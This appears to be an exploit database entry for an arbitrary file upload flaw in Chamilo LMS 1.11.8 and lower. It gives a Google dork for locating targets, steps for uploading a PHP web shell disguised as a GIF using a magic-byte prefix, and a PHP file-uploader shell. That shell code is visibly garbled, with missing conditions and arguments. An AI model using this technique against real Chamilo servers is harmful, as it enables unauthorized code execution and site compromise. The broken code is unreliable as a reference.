Chamilo LMS 1.11.8 Shell Upload Exploit

ID 1337DAY-ID-33282
Type zdt
Reporter Sohel Yousef
Modified 2019-09-26T00:00:00


Exploit for php platform in category web applications


# Exploit Title: Chamillo LMS Arbitrary File Upload
# Google Dork: "powered by chamilo"
# Exploit Author: Sohel Yousef jellyfish security team
# Software Link:
# Version: Chamilo 1.11.8 or lower to 1.8
# Category: webapps

1. Description

Any registered user can upload files and rename and change the file type to
php5 or php7 by ckeditor module in my files section

register here :


after registration you can view this sections



upload your shell in gif format and then rename the format

if the rename function was desabled

and add this  GIF89;aGIF89;aGIF89;a   before <?PHP
to be like this for examlple

  <title>PHP Test</title>
  <form action="" method="post" enctype="multipart/form-data">
  <input type="file" name="fileToUpload" id="fileToUpload">
  <input type="submit" value="upload file" name="submit">
 <?php echo '<p>FILE UPLOAD</p><br>';
 $tgt_dir = "uploads/";
 $tgt_file = $tgt_dir.basename($_FILES['fileToUpload']['name']);
 echo "<br>TARGET FILE= ".$tgt_file;
 //$filename = $_FILES['fileToUpload']['name'];
 echo "<br>FILE NAME FROM VARIABLE:- ".$_FILES["fileToUpload"]["name"];
    { echo "<br>file exists, try with another name"; }
 else   {
         echo "<br>STARTING UPLOAD PROCESS<br>";
        if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"],
        { echo "<br>File UPLOADED:- ".$tgt_file; }

          else  { echo "<br>ERROR WHILE UPLOADING FILE<br>"; }

and uplaod it as php.gif
you can browse the files form right click and click on browse option

# [2019-12-04]  #